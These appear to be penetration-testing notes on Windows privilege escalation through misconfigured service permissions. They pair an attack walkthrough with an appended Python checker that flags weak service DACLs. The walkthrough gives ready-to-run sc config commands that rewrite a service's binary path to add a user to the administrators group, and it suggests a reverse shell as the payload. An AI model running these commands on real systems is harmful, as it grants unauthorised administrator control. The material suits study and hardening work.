Binary Paths

PowerUp shows this under service permissions

WinPEAS shows this under services information

Run:

    accesschk64.exe -uwcv Everyone *

This checks which services the Everyone group has write access to, along with the service name.

To get more information about the service:

    accesschk64.exe -uwcv daclsvc

If we have CHANGE_CONFIG, run:

    sc qc daclsvc
    sc config daclsvc binpath= "net localgroup administrators user /add"

Run sc qc daclsvc again to check that BINARY_PATH_NAME has been set.

Run net localgroup administrators. You will only see the pre-existing users.

Then run sc start daclsvc (you may get an error; still run the next command to check):

    net localgroup administrators

You can also try setting the binpath to the path of a reverse shell to spawn an admin shell.
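A defender-side version of the permission check above, as an added example that is not part of the original page: it parses the SDDL string that `sc sdshow <service>` prints and reports allow-ACEs that give a broad group the right to reconfigure the service. The function name and both sample SDDL strings are constructed for illustration.

```python
import re

# SDDL right token -> (access-mask bit, name). Each one lets the holder
# change the service's binary path directly or grant themselves that right.
RISKY = {
    "DC": (0x00000002, "SERVICE_CHANGE_CONFIG"),
    "WD": (0x00040000, "WRITE_DAC"),
    "WO": (0x00080000, "WRITE_OWNER"),
    "GW": (0x40000000, "GENERIC_WRITE"),
    "GA": (0x10000000, "GENERIC_ALL"),
}
# SDDL aliases of broad, low-privileged trustees.
BROAD = {"WD": "Everyone", "AU": "Authenticated Users",
         "BU": "BUILTIN\\Users", "IU": "INTERACTIVE"}

def weak_service_aces(sddl):
    """Return [(trustee, [risky rights])] for allow-ACEs held by broad groups."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # keep DACL, drop SACL
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] != "A" or fields[5] not in BROAD:
            continue
        rights = fields[2]
        if rights.lower().startswith("0x"):      # rights given as a hex mask
            mask = int(rights, 16)
            risky = [name for bit, name in RISKY.values() if mask & bit]
        else:                                    # rights given as 2-letter tokens
            tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
            risky = [RISKY[t][1] for t in tokens if t in RISKY]
        if risky:
            findings.append((BROAD[fields[5]], risky))
    return findings

# Constructed sample strings in the format `sc sdshow <service>` prints.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;WD)")
HARDENED_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                 "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)")

if __name__ == "__main__":
    for label, sddl in (("weak", WEAK_SDDL), ("hardened", HARDENED_SDDL)):
        print(label, weak_service_aces(sddl))
```

Any finding means the service's DACL should be tightened so that only SYSTEM and administrators hold those rights.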
